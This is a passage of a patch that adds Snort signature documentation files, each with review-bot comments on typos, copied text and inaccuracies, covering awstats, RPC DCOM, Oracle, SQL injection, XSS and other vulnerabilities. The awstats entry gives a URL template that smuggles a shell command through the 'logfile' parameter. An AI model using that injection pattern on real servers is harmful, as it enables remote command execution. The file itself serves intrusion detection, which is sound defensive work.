+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
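Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") does not match the Detailed Information, which describes malformed data sent via RPC to an RPC port; either the scenario should describe the malformed RPC request or the Detailed Information should explain how a file request reaches the DCOM handler. "Expoit code exists." should be "Exploit code exists.", and Additional References is empty for a vulnerability that has a Microsoft security bulletin; add it.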
--- /dev/null
+++ b/doc/signatures/3463.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3463
+
+--
+Summary:
+This event is generated when an attempt is made to access the cgi script
+awstats.pl.
+
+--
+Impact:
+Possible execution of system commands.
+
+--
+Detailed Information:
+Adavanced Web Statistics (awstats) is used to process web server log
+files and produces reports of web server usage.
+
+Some versions of awstats do not correctly sanitize user input. This may
+present an attacker with the opportunity to supply system commands via
+the "logfile" parameter. For the attack to be sucessful the "update"
+parameter must also have the value set to "1". This event indicates that
+an attempt has been made to access the awstats.pl cgi script.
+
+--
+Affected Systems:
+	Awstats 6.1 and prior
+
+--
+Attack Scenarios:
+An attacker can supply commands of their choosing as a value for the
+logfile parameter by enclosing the commands in pipe charecters. For
+example: 
+
+ http://www.foo.com/cgi-bin/awstats.pl?update=1&logfile=|<command here>|
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+Disallow access to awstats.pl as a CGI script.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
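Review bot: spelling in Detailed Information and Attack Scenarios: "Adavanced Web Statistics" should be "Advanced Web Statistics", "sucessful" should be "successful", and "pipe charecters" should be "pipe characters". Additional References is empty even though Affected Systems pins the issue to "Awstats 6.1 and prior"; add the advisory that establishes that version boundary.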
--- /dev/null
+++ b/doc/signatures/3440.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3440
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
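Review bot: apart from the Sid value, this file is a byte-for-byte copy of 3277.txt, so the documentation does not tell the analyst what distinguishes rule 3440 from rule 3277 (for example a different RPC operation, transport or port). State the difference in Summary or Detailed Information, and fix the issues inherited from the copy: "Expoit code exists." should be "Exploit code exists.", the Attack Scenarios text about "a file with an overly long filename via a network share" does not match the malformed-RPC description above it, and Additional References is empty.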
--- /dev/null
+++ b/doc/signatures/2056.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2056
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server using the TRACE command.
+
+--
+Impact:
+Possible disclosure of information.
+
+--
+Detailed Information:
+The TRACE method is used when debugging a webserver to ensure that 
+server returns information to the client correctly. When used with other
+vulnerabilities it is possible to use the TRACE method to return 
+sensitive information from a webserver such as authentication data and 
+cookies.
+
+This is known as a Cross Site Tracing (XST) attack.
+
+--
+Affected Systems:
+All platforms running a webserver that responds to the TRACE method.
+
+--
+Attack Scenarios:
+The attacker needs to perform a TRACE request to a vulnerable server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The TRACE method is legitimate and may be used to debug a webserver or 
+can be used to debug other networking equipment.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the webserver from responding to TRACE requests.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/867593
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11213
+
+RFC:
+http://www.ietf.org/rfc/rfc2616.txt
+
+--
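Review bot: in Detailed Information "to ensure that server returns information to the client correctly" is missing the article ("that the server returns"). Under Ease of Attack, "Simple" lacks the full stop used everywhere else, and "None Known" under False Negatives should be "None known." to match the other files. Since False Positives correctly notes that TRACE is a legitimate debugging method, it would help the reader if the Corrective Action also mentioned that disabling TRACE is only a mitigation for the XST scenario described, not a fix for the underlying vulnerabilities it is chained with.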
--- /dev/null
+++ b/doc/signatures/100000702.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000702
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Webvizyon" application running on a webserver. Access to the file "SayfalaAltList.asp" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "SayfalaAltList.asp" script used by the "Webvizyon" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Webvizyon
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
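Review bot: the file opens with two empty "+" lines and ends with a stray blank line after the closing "--"; drop both. Wording: "may indicate that an exploitation attempt has been attempted" is redundant, "running ona web server" is missing a space, "attackers choosing" needs the possessive, and the sentence "it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries" is a comma splice that should be split into two sentences. The blank line before "--" is missing after the Sid value, the Affected Systems entry and the Contributors list.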
--- /dev/null
+++ b/doc/signatures/1345.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted cpp command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The cpp
+command is theGNU project's C and C++ compiler used to compile C and
+C++ sourcefiles into executable binary files. The attacker could
+possibly compilea program needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains
+'/usr/bin/cpp'inthe URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested on acommand line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
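Review bot: the Sid field says "1341" but the file is 1345.txt and the Additional References list sids 1342, 1343, 1344, 1346, 1347 and 1348, i.e. every sibling except 1345; the Sid should be 1345. The description "The cpp command is theGNU project's C and C++ compiler" is inaccurate: cpp is the GNU C preprocessor, the compilers are gcc and g++, so the Impact "Attempt to compile a binary on a host." overstates what the command does. The text has also lost spaces throughout ("compiile", "theGNU", "sourcefiles", "compilea", "binaryprogram", "'/usr/bin/cpp'inthe URI", "it'sdesignated", "acommand", "Wheneverpossible", "shouldhave", "addedto", "runtimesecurelevel", "thesecurelevel"), "it's" should be "its", and the Affected Systems section present in every other file is missing.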
--- /dev/null
+++ b/doc/signatures/2620.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2620
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
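Review bot: as in 2614.txt and 2616.txt, "a Oracle database implementation" should read "an Oracle database implementation" and "requires an attacker to logon to the database" should be "to log on to the database". The Affected Systems entry uses spaces for indentation where the rest of the patch uses a tab.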
--- /dev/null
+++ b/doc/signatures/100000770.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000770
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "typeface" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "typeface" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
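Review bot: same template defects as 100000702.txt: two empty "+" lines at the top and a stray blank line after the final "--", "may indicate that an exploitation attempt has been attempted" (redundant), "running ona web server" (missing space), "attackers choosing" (possessive), and the comma splice "compromise the database backend for the application, the attacker may also be able to execute system binaries". Missing blank lines before "--" after the Sid value, the Affected Systems entry and the Contributors list. Since these SQL injection files share one template, fix the template once rather than each copy.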
--- /dev/null
+++ b/doc/signatures/2901.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2901
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_statistics
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
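Review bot: the same substitution artefact as in 2717.txt splits the sentence in Detailed Information: "vulnerability in the procedure register_statistics" / ". This procedure is included in" / "sys.dbms_repcat_conf." should be one sentence without the orphaned full stop. "Oracle Oracle9i" under Affected Systems duplicates the vendor name, and Additional References is empty.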
--- /dev/null
+++ b/doc/signatures/119-3.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid: 
+119-3
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when Unicode characters are present in a request
+sent to a web server. This may indicate an attempt to evade an IDS in an
+attempted attack against the server.
+
+No known browsers use unicode encoding, it is likely that this event
+indicates a malicious request.
+
+--
+Affected Systems:
+	Microsoft IIS Servers.
+
+--
+
+Attack Scenarios: 
+An attacker might encode the malicious request to the web server using
+Unicode characters, this may then evade an IDS monitoring traffic and 
+he could then launch a successful attack without being detected.
+
+-- 
+
+Ease of Attack: 
+Simple. Exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
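Review bot: "No known browsers use unicode encoding, it is likely that this event indicates a malicious request." is a comma splice; split it or join the clauses with "so". The Affected Systems entry lists only "Microsoft IIS Servers." while the Summary describes a generic http_inspect preprocessor alert; if the alert is specific to the IIS Unicode encoding, Detailed Information should say so, otherwise the Affected Systems should be widened. The layout also differs from the other files: extra blank lines follow several "-- " separators and those separators carry trailing whitespace.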
--- /dev/null
+++ b/doc/signatures/100000662.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000662
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "homepage" parameter in the "edit.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
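Review bot: the Impact and the second paragraph of Detailed Information are the remote-file-include boilerplate ("Possible execution of arbitrary code of the attackers choosing", "execute system binaries or malicious code") and overstate a cross site scripting issue, whose Attack Scenarios section correctly describes a malicious link that steals information from the user who clicks it; rewrite Impact to describe client-side script execution in the victim's browser and session or credential theft. Also "attackers choosing" needs the possessive, the blank line before "--" is missing after the Sid value, the Affected Systems entry and the Contributors list, and the file ends with a stray blank line.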
--- /dev/null
+++ b/doc/signatures/2005.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+2005
+
+--
+Summary:
+KCMS (Kodak Color Management System) is an RPC (Remote Procedure Call)
+service for Sun Solaris operating systems. It is able to read profiles
+stored on remote machines. It is possible for an attacker to bypass
+directory traversal checks and read any file on the remote system.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine not limited to user accounts
+and business data.
+
+--
+Detailed Information:
+The attacker first needs to create a directory under
+/etc/openwin/devdata/profiles or /usr/openwin/etc/devdata/profiles,
+using the ToolTalk database server is one method of creating a
+directory. Once this has been achieved, the attacker is then able to
+perform the directory traversal.
+
+The directory traversal allows the attacker to read any file on the
+compromised system. Once a sensitive system file such as the system
+password database has been retrieved, the attacker may use other tools
+at his leisure to discover username and password information. This may
+lead to further system compromise.
+
+The KCMS daemon runs with root privileges and is typically started on
+boot via inetd. The ToolTalk database server is also commonly installed
+and started in this manner. The KCMS daemon usually listens on UDP port
+32871 although this can vary.
+
+--
+Affected Systems:
+	Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
+	Sun Microsystems Solaris 2.6 (Sparc/Intel)
+	Sun Microsystems Solaris 7 (Sparc/Intel)
+	Sun Microsystems Solaris 8 (Sparc/Intel)
+	Sun Microsystems Solaris 9 (Sparc/Intel)
+
+--
+Attack Scenarios:
+The ToolTalk database server procedure TT_ISBUILD can be used to create
+a directory named TT_DB anywhere on a remote system. Creation of this
+directory then allows the attacker to use directory traversal to further
+compromise the machine.
+
+--
+Ease of Attack:
+Once the directory has been created, further compromise is simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the KCMS daemon in the file /etc/inetd.conf. Kill any running
+KCMS processes and restart the inet daemon.
+
+Configure your firewall to restrict external access to the TCP and UDP
+port 111 used by the RPC port mapper service and the range used by RPC
+services, typically 32700 to 34000.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/850785
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0027
+
+--
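Review bot: Corrective Action only disables the KCMS daemon and firewalls the RPC port range, but Detailed Information and Attack Scenarios name the ToolTalk database server (its TT_ISBUILD procedure) as the means of creating the directory the traversal depends on, so the mitigation should also cover disabling or patching the ToolTalk database server in /etc/inetd.conf. The UDP port given for KCMS (32871) falls inside the 32700 to 34000 range quoted in Corrective Action, which is worth stating so readers connect the two. Style: the CVE link still uses the legacy CAN-2003-0027 name.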
--- /dev/null
+++ b/doc/signatures/324.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+
+324
+
+--
+Summary:
+This event is generated when a null character in a Finger request is 
+detected.
+
+--
+Impact:
+Some systems will respond to a null finger request by supplying a list 
+of usernames present on the host.
+
+Disclosure of usernames is an Information Gathering risk.  The remote 
+user can use this information in other exploits that require knowing 
+user names, or as a basis for social engineering.
+
+--
+Detailed Information:
+A packet is transmitted to server port 79 (Finger) with a null character
+in the data.  Some Unix finger commands will respond with a full list of
+usernames.  A remote attacker could use this information for other 
+exploits, including dictionary-based password attacks and social 
+engineering attempts.
+
+--
+Affected Systems:
+	Some UNIX based systems
+
+--
+Attack Scenarios:
+See detailed information section above.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Disable the finger daemon in inetd.conf, or block untrusted access to 
+port 79 using a packet filtering firewall.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References: CVE-1999-0612, 
+
+Arachnids:
+http://www.whitehats.com/info/IDS377 (Arachnids,377)
+
+--
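Review bot: The Additional References block breaks the format used by the other files: the CVE id is appended inline to the heading ("Additional References: CVE-1999-0612,") with a trailing comma and no URL, whereas elsewhere it is written as a "CVE:" label followed by the cve.mitre.org link on its own line. The Sid block also has a stray blank line between "Sid:" and "324", and the "-- " separator before Additional References carries trailing whitespace. Affected Systems ("Some UNIX based systems") would be more useful if it named the finger implementations known to list users on a null request.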
--- /dev/null
+++ b/doc/signatures/3306.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3306
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
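Review bot: Additional References is empty although the Summary calls this a known vulnerability in Microsoft RPC DCOM; add the vendor bulletin and a CVE entry in the "CVE:" format the other files use. Attack Scenarios ("a request for a file with an overly long filename via a network share") does not obviously follow from Detailed Information, which describes a malformed request to an RPC port; one sentence linking the long filename to the RPC request would help. Typo in Ease of Attack: "Expoit".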
--- /dev/null
+++ b/doc/signatures/2606.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2606
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "comment_on_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
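Review bot: The sentence about setting "$ORACLE_PORTS" to "any" on Windows is dropped into Detailed Information without saying that this is a Snort rule variable rather than an Oracle setting, or why Windows installations differ; move it to Corrective Action (or a rule-configuration note) and state the reason. Attack Scenarios names the "type" variable while Detailed Information only says "a parameter", so the two should agree. Grammar: "a Oracle database" should read "an Oracle database"; Affected Systems is indented with spaces where the other files use a tab.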
--- /dev/null
+++ b/doc/signatures/3078.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid:
+3078
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft implementation of the Network News Transport
+Protocol (NNTP) for Internet Information Server (IIS).
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+The Microsoft implementation of NNTP for IIS contains a programming
+error in the processing of user supplied input that may present an
+attacker with multiple opportunites to execute code of their choosing on
+an affected system.
+
+--
+Affected Systems:
+. Microsoft Windows NT Server 4.0 NNTP component
+. Microsoft Windows 2000 Server NNTP component
+. Microsoft Windows Server 2003 NNTP Component
+. Microsoft Windows Server 2003 64-Bit Edition NNTP Component
+
+--
+Attack Scenarios:
+An attacker must supply specially crafted input to a vulnerable system
+to cause the overflow to occur.
+
+--
+Ease of Attack:
+Moderate. Example code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CORE Technologies:
+http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
+
+--
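Review bot: Affected Systems uses ". " bullets where every other file uses a tab-indented list, and the Corrective Action lines are missing their full stops. Grammar and spelling: "in Microsoft implementation" should be "in the Microsoft implementation", and "opportunites" should be "opportunities". Detailed Information says the flaw gives "multiple opportunities" to execute code but does not say which NNTP command or input is involved, so a reader cannot relate the description to the rule.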
--- /dev/null
+++ b/doc/signatures/100000368.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000368
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_disallow.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_disallow.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
